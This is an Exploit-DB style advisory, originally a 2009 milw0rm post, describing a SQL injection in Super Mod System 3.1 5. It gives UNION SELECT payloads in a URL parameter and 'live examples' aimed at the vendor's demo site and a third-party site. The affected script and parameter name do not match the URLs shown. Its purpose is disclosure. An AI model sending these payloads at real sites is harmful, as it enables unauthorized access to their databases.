Super Mod System 3.1 5 SQL Injection Vulnerability

vendor:

Super Mod System

by:

MizoZ [EvilWay Team]

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Super Mod System

Affected Version From: 3.1 5

Affected Version To: 3.1 5

Patch Exists: NO

Related CWE: N/A

CPE: a:classified-software:super_mod_system:3.1_5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Super Mod System 3.1 5 SQL Injection Vulnerability

A SQL injection vulnerability exists in Super Mod System 3.1 5, which allows an attacker to execute arbitrary SQL commands via the 'sb_id' parameter in the 'popup.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL code. An example of such a request is: http://www.classified-software.co.uk/super-mod-system-v3/index.php?s=3+and+1=0+union+all+select+1,2,3,4,5--

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

----------------------------------------------------------------------------------------------------
  Name : Super Mod System 3.1 5
  Site : http://www.classified-software.co.uk/
  Demo : http://www.classified-software.co.uk/super-mod-system-v3/

----------------------------------------------------------------------------------------------------
 
  Found By : MizoZ [EvilWay Team]
  Made in  : Morocco
  Contact  : mizoz[at]9[dot]cn
  Greetz   : Moudi , Zuka , optix , All friends
  Website : BlackArea.org (Coming Soon)
----------------------------------------------------------------------------------------------------

SQL Injection popup.php (GET : sb_id) :
[HOST]/[PATH]/index.php?s=[SQL CODE]

SQL CODE : -6+union+select+1,2,3,4,5--

Live Exemples :
http://www.classified-software.co.uk/super-mod-system-v3/index.php?s=3+and+1=0+union+all+select+1,2,3,4,5--
http://www.thepharmaclassifieds.com/index.php?s=-6+union+select+1,2,3,4,5--

----------------------------------------------------------------------------------------------------

# milw0rm.com [2009-07-27]